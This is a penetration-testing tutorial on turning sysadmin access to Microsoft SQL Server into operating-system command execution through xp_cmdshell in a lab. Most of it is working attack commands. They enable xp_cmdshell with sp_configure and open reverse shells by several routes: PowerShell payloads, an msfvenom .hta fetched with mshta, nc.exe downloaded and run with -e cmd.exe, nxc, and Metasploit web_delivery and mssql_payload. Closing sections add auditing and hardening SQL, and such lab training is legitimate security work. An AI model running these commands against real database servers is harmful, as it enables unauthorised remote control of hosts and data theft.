MSSQL for Pentester: Command Execution with xp_cmdshell
xp_cmdshell is one of the most useful primitives available to a penetration tester who has gained access to a Microsoft SQL Server instance. It is an extended stored procedure, part of the family Microsoft shipped with SQL Server 6.0 (1995), that hands a string to a Windows command shell on the database host and returns the command's standard output to the caller as rows of text. Because it is invoked from Transact-SQL (T-SQL), Microsoft's dialect of SQL with procedural constructs, control-of-flow statements and additional built-in functions, operating system command execution becomes just another statement an attacker can issue over the database connection.
We will now dive into the details of xp_cmdshell and explore how to utilize it for command execution. Additionally, we will discuss the different methods of enabling xp_cmdshell, including using the GUI, sqsh, and impacket-mssqlclient.
Table of Contents
- Lab Setup
- Enabling xp_cmdshell (Using GUI)
- Enabling xp_cmdshell (Using sqsh)
- Enabling xp_cmdshell (Using impacket-mssqlclient)
- Exploiting MSSQL (Reverse shell)
- Reverse shell using reverse shell generator
- Reverse shell using .hta file
- Reverse shell using netcat binary
- Reverse shell using python script
- Reverse shell using nxc
- Reverse shell using crackmapexec and metasploit
- Command execution using PowerUPSQL
- Conclusion
Lab Setup
Target Machine: Windows (MSSQL Server) (192.168.31.126)
Attacker Machine: Kali Linux (192.168.31.141)
Setup of MSSQL server can be done using the steps given at this link: https://www.hackingarticles.in/penetration-testing-lab-setupms-sql/
Enabling xp_cmdshell (Using GUI)
After the setup is complete, we can enable xp_cmdshell. It is disabled by default, and turning it on with sp_configure followed by RECONFIGURE requires the ALTER SETTINGS server permission, which members of the sysadmin (and serveradmin) fixed server roles hold implicitly. Calling xp_cmdshell itself also requires sysadmin membership; a non-sysadmin login can only use it if it has been granted EXECUTE on the procedure and an xp_cmdshell proxy account has been configured. In this case, we use the SA login, which is a member of sysadmin and therefore holds the highest level of permissions within the SQL Server instance.
We start by logging in to the SQL Server instance as SA in SQL Server Management Studio (SSMS).
Once connected as a sysadmin, right-click the instance in Object Explorer and choose Facets. In Microsoft SQL Server, Facets form a core part of the Policy-Based Management (PBM) framework. They group logical properties that can be configured, and enforced through policies, on SQL Server instances.
Next, after clicking on Facets, a new window appears. In that window, select Surface Area Configuration. Surface Area Configuration refers to a group of logical properties that administrators can manage to control the configuration and feature availability of SQL Server instances.
Inside the Surface Area Configuration, we find the XPCmdShellEnabled option, which is set to False by default. Notably, xp_cmdshell spawns a Windows process that inherits the security context of the SQL Server service account (for a sysadmin caller), so whatever rights that account holds on the host are exactly the rights an attacker gets from the resulting shell.
To enable the feature, set xp_cmdshell to True and click OK.
The GUI route presumes SSMS access to the instance. From an attacker's machine the same change is made with the sp_configure system stored procedure, which we do next from sqsh.
Enabling xp_cmdshell (Using sqsh)
sqsh is a command-line SQL client available in Kali Linux. We first connect to the target instance as SA, then check whether xp_cmdshell is enabled. The connection command is:
sqsh -S 192.168.31.126 -U sa -P "Password@123"
After establishing the connection, execute the following command to verify whether xp_cmdshell is enabled:
xp_cmdshell 'whoami'
go
At this point the server responds that access to the procedure is blocked because the xp_cmdshell component is turned off as part of the server's security configuration. To turn it on we use sp_configure, the system stored procedure for viewing and changing server-level settings; a change only takes effect after RECONFIGURE. Because xp_cmdshell is an advanced option, 'show advanced options' has to be switched on and reconfigured first, otherwise sp_configure reports that the option does not exist. In sqsh, run the following in sequence:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go
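The same check-then-enable sequence written out as a single T-SQL batch. This is an added example, not part of the original article: it confirms the caller's role and permission first, records the current state of both options before touching them, enables xp_cmdshell only when it is off, captures the command output in a table instead of letting it scroll past, and restores the original settings afterwards. The command run ('whoami /all') is an assumption; the catalog views, functions and procedures are standard SQL Server objects. Paste it into sqsh and terminate with go, or run it from SSMS; impacket-mssqlclient's built-in enable_xp_cmdshell performs the same sp_configure/RECONFIGURE steps without the checks.

```sql
-- Added example (not from the original article). Run as one batch.

-- Step 1: who are we to the server, and do we hold the permission that
-- sp_configure + RECONFIGURE need (ALTER SETTINGS, implied by sysadmin)?
SELECT SUSER_SNAME()                                    AS login_name,
       IS_SRVROLEMEMBER('sysadmin')                    AS is_sysadmin,        -- 1 = yes
       HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS') AS can_alter_settings; -- 1 = yes

-- Step 2: configured vs. running value of both options. A value that is set
-- but not "in use" means someone ran sp_configure without RECONFIGURE.
SELECT name, value AS configured, value_in_use AS running
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- Step 3: remember the original state, then enable only what is off.
-- 'xp_cmdshell' is an advanced option, so 'show advanced options' must be
-- on (and reconfigured) before sp_configure will accept it.
DECLARE @adv_was  int = (SELECT CAST(value_in_use AS int) FROM sys.configurations
                         WHERE name = 'show advanced options');
DECLARE @xp_was   int = (SELECT CAST(value_in_use AS int) FROM sys.configurations
                         WHERE name = 'xp_cmdshell');
IF @xp_was = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- Step 4: run the command and keep its output in a table variable. Each line
-- of stdout comes back as one row; the trailing NULL row that xp_cmdshell
-- appends is filtered out. For a sysadmin caller the process runs as the
-- SQL Server service account, so whoami reports that account, not the login.
DECLARE @output TABLE (line nvarchar(4000));
INSERT INTO @output EXEC master..xp_cmdshell 'whoami /all';   -- assumed command
SELECT line FROM @output WHERE line IS NOT NULL;

-- Step 5: put the server back the way we found it (a tester cleaning up,
-- or an administrator re-hardening after an authorised one-off use).
IF @xp_was = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;
IF @adv_was = 0
BEGIN
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
```

Step 1 is worth keeping even on an engagement: if is_sysadmin comes back 0, sp_configure will fail and the only remaining route to xp_cmdshell is an existing EXECUTE grant plus proxy account, which is a different finding altogether.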
Besides sqsh, impacket-mssqlclient can enable xp_cmdshell for us. For that section we switch to Windows authentication and log in as the raj user.
Enabling xp_cmdshell (Using impacket-mssqlclient)
In recent versions of Microsoft SQL Server there are three primary ways to authenticate:
- Windows authentication
- Microsoft Entra ID authentication
- SQL Server authentication
Here we authenticate as the raj user with Windows authentication, using the impacket-mssqlclient script; the -windows-auth flag selects that mode:
impacket-mssqlclient raj:'Password@1'@192.168.31.126 -windows-auth
After login, impacket-mssqlclient's built-in enable_xp_cmdshell command runs the sp_configure and RECONFIGURE sequence for us (the login must still be a sysadmin), and its xp_cmdshell command wraps the rest of the line in a call to master..xp_cmdshell:
enable_xp_cmdshell
xp_cmdshell whoami
Next, we discuss the different methods of exploiting MSSQL once xp_cmdshell is available: a reverse shell generator, an .hta file, the netcat binary, a Python script, nxc, and crackmapexec together with Metasploit. Finally, we use PowerUpSQL to execute commands on the target system.
Exploiting MSSQL (Reverse shell)
There are several ways to exploit an MSSQL Server. These include a direct reverse shell via command execution, exploitation using Metasploit, or leveraging a reverse shell generator script. In this section, we will discuss each method in detail.
Reverse shell using reverse shell generator
One common technique is to run a reverse shell command directly through xp_cmdshell. Payloads can be copied from https://www.revshells.com/. First start a listener on port 4444 on the Kali machine:
rlwrap nc -lvnp 4444
Then copy the PowerShell #3 (Base64) payload from the generator and paste the entire payload as the argument to xp_cmdshell. The Base64-encoded form is used because the command passes through T-SQL and cmd.exe before PowerShell sees it, and an encoded command contains no quotes or special characters for either of them to mangle.
Once the payload executes via xp_cmdshell, the reverse shell connects back to the listener on port 4444.
Reverse shell using .hta file
The .hta (HTML Application) file is a standalone script-based program written in HTML and executed by mshta.exe (Microsoft HTML Application Host). In the context of xp_cmdshell, an .hta file lets us run VBScript or JScript on the target with a single mshta command that fetches the file from a URL we control.
We generate the .hta file with msfvenom on Kali, then have the target fetch and run it through xp_cmdshell to obtain a reverse shell. The msfvenom command is:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.31.141 lport=1234 -f hta-psh > shell.hta
Serve shell.hta over HTTP from the Kali machine (an HTTP server on port 80, such as updog -p 80 run in the file's directory). mshta.exe, invoked from xp_cmdshell, then downloads and executes it directly:
xp_cmdshell "mshta http://192.168.31.141/shell.hta"
Observe that the reverse shell arrives on port 1234 after the command runs from xp_cmdshell. The listener, started beforehand:
rlwrap nc -lvnp 1234
Reverse shell using netcat binary
Kali Linux ships a set of Windows binaries (the windows-binaries package) under /usr/share/windows-binaries; one of them is nc.exe (Netcat). We can upload nc.exe to the target through xp_cmdshell and run it from there. Serve the directory over HTTP from Kali:
cd /usr/share/windows-binaries
ls -al
updog -p 80
The following commands, run inside xp_cmdshell, download nc.exe onto the target and then execute it to return a shell. The download uses PowerShell's wget alias for Invoke-WebRequest; C:\Users\Public is chosen because it is writable by any local account on a default Windows installation, so the service account can drop the file there.
xp_cmdshell "powershell wget http://192.168.31.141/nc.exe -OutFile c:\Users\Public\nc.exe"
xp_cmdshell "c:\Users\Public\nc.exe -e cmd.exe 192.168.31.141 8888"
Observe that the reverse shell is obtained on port 8888 on the Kali machine:
rlwrap nc -lvnp 8888
Reverse shell using python script
Alternatively, a Python script can generate the reverse shell payload. This payload can be used within xp_cmdshell to establish a reverse shell connection. You can download the script from here:
https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58
The script requires two arguments — the attacker’s IP address and the listener’s port number. Use the following command to generate the payload with the Python script:
python3 mkpsrevshell.py 192.168.31.141 9999
We then use the output generated by the script directly as the xp_cmdshell argument to obtain a reverse shell on port 9999.
The reverse shell is obtained after the execution of the command in the xp_cmdshell.
rlwrap nc -lvnp 9999
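Both the revshells.com payload used earlier and the mkpsrevshell.py script in this section produce the same thing: a PowerShell reverse shell encoded as Base64 of UTF-16LE text and passed to powershell -e, so that no quote or special character has to survive T-SQL, cmd.exe and PowerShell parsing in turn. The following added example (not from the original article or from either tool) does that encoding inside T-SQL itself, which is useful when a SQL prompt is all you have. The script body is a harmless placeholder and the -nop/-w hidden switches are choices, not requirements; substituting the reverse-shell one-liner from either generator yields the same kind of command they emit. It also shows the one quoting rule T-SQL imposes (a single quote inside a literal is written twice) and checks the argument length limit of xp_cmdshell before sending.

```sql
-- Added example (not from the original article). Encodes a PowerShell script
-- the way powershell -EncodedCommand (-e) expects it and hands it to
-- xp_cmdshell, all from T-SQL.

-- The script to run. Placeholder body: substitute the reverse-shell
-- one-liner from revshells.com or mkpsrevshell.py here. Single quotes inside
-- the T-SQL literal are doubled; PowerShell receives them as single quotes.
DECLARE @script nvarchar(max) =
    N'Write-Output (''running as '' + $env:USERNAME + '' on '' + $env:COMPUTERNAME)';

-- Casting nvarchar to varbinary yields the text's UTF-16LE bytes, which is
-- exactly the encoding PowerShell expects behind -e.
DECLARE @bytes varbinary(max) = CAST(@script AS varbinary(max));

-- Base64 via the xml type's xs:base64Binary constructor: no manual loops.
DECLARE @b64 varchar(max) =
    CAST(N'' AS xml).value('xs:base64Binary(sql:variable("@bytes"))', 'varchar(max)');

-- xp_cmdshell takes one nvarchar(4000) (or varchar(8000)) argument and does
-- not accept an expression, so the command is assembled in a variable.
-- -nop skips the profile, -w hidden avoids a window, -e takes the encoding.
DECLARE @prefix nvarchar(100) = N'powershell -nop -w hidden -e ';
IF LEN(@prefix) + LEN(@b64) > 4000
    RAISERROR('encoded command exceeds xp_cmdshell''s 4000-character argument; stage the script over HTTP instead', 16, 1);
ELSE
BEGIN
    DECLARE @cmd nvarchar(4000) = @prefix + @b64;
    SELECT @cmd AS command_sent;       -- what cmd.exe will actually receive
    EXEC master..xp_cmdshell @cmd;     -- stdout comes back as rows of text
END;
```

Because the UTF-16LE encoding roughly quadruples the script's length in Base64, long reverse-shell one-liners approach the 4000-character limit quickly; that is why the .hta, nc.exe and web_delivery sections stage a file over HTTP instead of inlining everything.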
Reverse shell using nxc
nxc (NetExec), the successor to CrackMapExec, is a network service exploitation tool; its mssql module can upload and download files and execute commands over the SQL connection. Here we use nxc to upload nc.exe to the target and run it to establish a reverse shell.
cd /usr/share/windows-binaries
ls -al
nxc mssql 192.168.31.126 -u "raj" -p "Password@1" --put-file nc.exe c:\Users\Public\nc.exe
With nc.exe in place, nxc's -x option executes a command on the target through xp_cmdshell, so we run the uploaded binary from there:
nxc mssql 192.168.31.126 -u "raj" -p "Password@1" -x "c:\Users\Public\nc.exe -e cmd.exe 192.168.31.141 6666"
We obtain the reverse shell on port 6666 on the Kali machine and can work on the system remotely:
rlwrap nc -lvnp 6666
Reverse shell using crackmapexec and metasploit
Metasploit's web_delivery module hosts a payload on a URL and prints a one-line stager that downloads and runs it; anything that can execute a command on the target, including crackmapexec's mssql module, can trigger that stager. Use the following commands to set it up:
msfconsole -q
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.31.141
run
Once the module runs, Metasploit prints a URL hosting the payload (target 2 selects the PowerShell stager). You pass this URL to crackmapexec, which fetches and executes it on the target to get the reverse shell.
In this example, the payload is available at:
http://192.168.31.141:8080/TrBYNRKFCChZSz
crackmapexec mssql 192.168.31.126 -u "raj" -p "Password@1" -M web_delivery -o URL=http://192.168.31.141:8080/TrBYNRKFCChZSz
crackmapexec's web_delivery module makes the target fetch the generated URL through xp_cmdshell. Observe that a Meterpreter session opens as soon as the stager runs.
Additionally, you can use the mssql_payload exploit module in Metasploit. It authenticates to the instance with the supplied credentials, uses xp_cmdshell to deliver the payload, and opens a Meterpreter session. Use the following commands to run this module:
use exploit/windows/mssql/mssql_payload
set rhost 192.168.31.126
set database master
set username sa
set password Password@123
run
We execute the exploit and subsequently obtain a Meterpreter session, thereby gaining access to the system.
Another viable option is the auxiliary/admin/mssql/mssql_exec module, which runs a single command of your choosing through xp_cmdshell and prints its output, rather than opening a session. The commands for this module are:
use auxiliary/admin/mssql/mssql_exec
set rhost 192.168.31.126
set database master
set username sa
set password Password@123
set cmd "ipconfig"
run
Command execution using PowerUPSQL
Penetration testers and security professionals use PowerUpSQL to audit and assess SQL Server instances. It offers capabilities for discovering, enumerating, and exploiting SQL Server environments across enterprise networks. You can download the script from: https://github.com/NetSPI/PowerUpSQL
With PowerUpSQL we can verify that the login is a sysadmin and check the status of xp_cmdshell before running commands; Invoke-SQLOSCmd enables xp_cmdshell if it is off, runs the command, and returns the setting to its previous state, which -Verbose shows step by step.
Finally, from a shell on the target (or any Windows host that can reach the instance) with PowerUpSQL.ps1 in the current directory, run the following PowerShell commands:
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmd -Username sa -Password Password@123 -Instance WIN-JE6KIAEEJ09\SQLEXPRESS -Command whoami -Verbose
Conclusion
In conclusion, xp_cmdshell is a legitimate and useful feature of Microsoft SQL Server, but once a sysadmin login is compromised it turns every database connection into remote command execution on the host, running in the security context of the SQL Server service account. Organizations should therefore keep xp_cmdshell disabled unless there is a documented need for it, never expose the SA or any other sysadmin credentials, run the SQL Server service under a low-privilege account so that a shell obtained this way inherits as little as possible, limit who can reach the instance over the network, and alert on sp_configure changes that turn the option on.
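For the defensive side of the conclusion, the following added T-SQL (not from the original article) audits the attack surface the techniques above rely on and then closes it: whether the option is on, which logins hold sysadmin and so can enable and call it, whether the non-sysadmin route (an EXECUTE grant plus a proxy credential) exists, which account a spawned shell would run as, and finally a server audit so that re-enabling it or adding a sysadmin is recorded. The audit name and file path are assumptions; the catalog views, audit action groups and procedures are documented SQL Server objects.

```sql
-- Added example (not from the original article): defender's audit and hardening.

-- 1. Is the option on? value_in_use is what the engine currently enforces.
SELECT name, value_in_use AS running
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- 2. Every sysadmin member can enable and call xp_cmdshell; this list, not
--    just 'sa', is the real blast radius. Disabled logins are shown as well.
SELECT m.name AS login_name, m.type_desc, m.is_disabled
FROM   sys.server_role_members rm
JOIN   sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN   sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE  r.name = 'sysadmin';

-- 3. The non-sysadmin path: EXECUTE granted on the procedure in master plus
--    the proxy credential. Either one on a server that never needed it is a
--    finding in its own right.
SELECT p.name AS grantee, dp.permission_name, dp.state_desc
FROM   master.sys.database_permissions dp
JOIN   master.sys.database_principals p ON p.principal_id = dp.grantee_principal_id
WHERE  dp.major_id = OBJECT_ID('master.sys.xp_cmdshell');

SELECT name AS proxy_credential
FROM   sys.credentials
WHERE  name = '##xp_cmdshell_proxy_account##';

-- 4. What a shell spawned by xp_cmdshell would run as (requires VIEW SERVER STATE).
SELECT servicename, service_account
FROM   sys.dm_server_services;

-- 5. Harden: switch the option off and leave 'show advanced options' as it was.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
GO

-- 6. Record the operations an attacker needs to undo step 5: configuration
--    changes (sp_configure/RECONFIGURE require ALTER SETTINGS, which falls
--    under SERVER_OPERATION_GROUP) and new sysadmin members.
CREATE SERVER AUDIT xp_cmdshell_watch
    TO FILE (FILEPATH = 'C:\SQLAudit\');           -- assumed path; must exist
GO
CREATE SERVER AUDIT SPECIFICATION xp_cmdshell_watch_spec
    FOR SERVER AUDIT xp_cmdshell_watch
    ADD (SERVER_OPERATION_GROUP),
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP)
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT xp_cmdshell_watch WITH (STATE = ON);
GO
```

Step 4 is the one most often overlooked: if service_account is LocalSystem or a domain administrator, every technique in this article yields that account, and lowering it to a dedicated low-privilege service account does more to contain an xp_cmdshell compromise than disabling the option alone, since a sysadmin can always turn the option back on.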
Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant.
Good article 🙂 Thank you for sharing this.